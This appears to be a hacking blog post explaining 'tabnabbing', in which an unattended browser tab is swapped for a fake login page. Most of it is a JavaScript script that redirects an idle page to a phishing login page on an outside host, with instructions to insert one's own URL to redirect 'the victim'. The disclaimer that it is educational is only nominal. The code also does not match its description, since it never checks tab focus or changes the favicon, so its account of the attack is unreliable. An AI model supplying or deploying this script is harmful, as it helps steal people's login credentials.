Traditional phishing attacks are reasonably easy to avoid, just don’t click links in suspicious e-mails (or, for the really
paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious way to launch an attack by
hijacking your unattended browser tabs.
The attack works by first detecting that the tab the page is in does not have focus. Then the attacking script can change
the tab favicon and title before loading a new site, say a fake version of gmail or orkut, in the background.
Even scarier, the attack can parse through your history to find sites you actually visit and impersonate them.
Because most of us trust our tabs to remain on the page we left them on, this is a particularly difficult attack to detect. As
Raskin writes, "as the user scans their many open tabs, the favicon and title act as a strong visual cue — memory is
mailable and moldable and the user will most likely simply think they left *the+ tab open.”
The only clue that you’re being tricked is that the URL will be wrong.
The Script Used is as Below.-
<a> open this in a tab of your browser and wait for 10 seconds and see after you come back but leave this page and go
to other tab to see this magic.</a>
<script type="text/javascript">
var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
function initRedirect(){
if (typeof document.body.scrollTop != "undefined"){ //IE,NS7,Moz
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
else if (typeof window.pageYOffset != "undefined"){ //other browsers that support pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;
clearInterval(timerPoll); //stop polling scroll move
clearInterval(timerRedirect); //stop timed redirect
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect = setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000); //set timed
redirect
}
//else do nothing
}
function pollActivity(){
if ((typeof document.body.scrollTop != "undefined" && (xScroll!=document.body.scrollLeft ||
yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
(typeof window.pageYOffset != "undefined" && (xScroll!=window.pageXOffset || yScroll!=window.pageYOffset))) {
//other browsers
initRedirect(); //reset polling scroll position
}
} document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
Replace the URL highlighted here with your URL where you want the victim to redirect.
Use This Script in the Page and then the page will redirect after 10 sec when the user if not on the particular tab.
“Do not use this hack trick in any criminal activities and please do not destroy any ones account
this is for educational purpose only”.
No comments:
Post a Comment
Any Problem, Do let us know?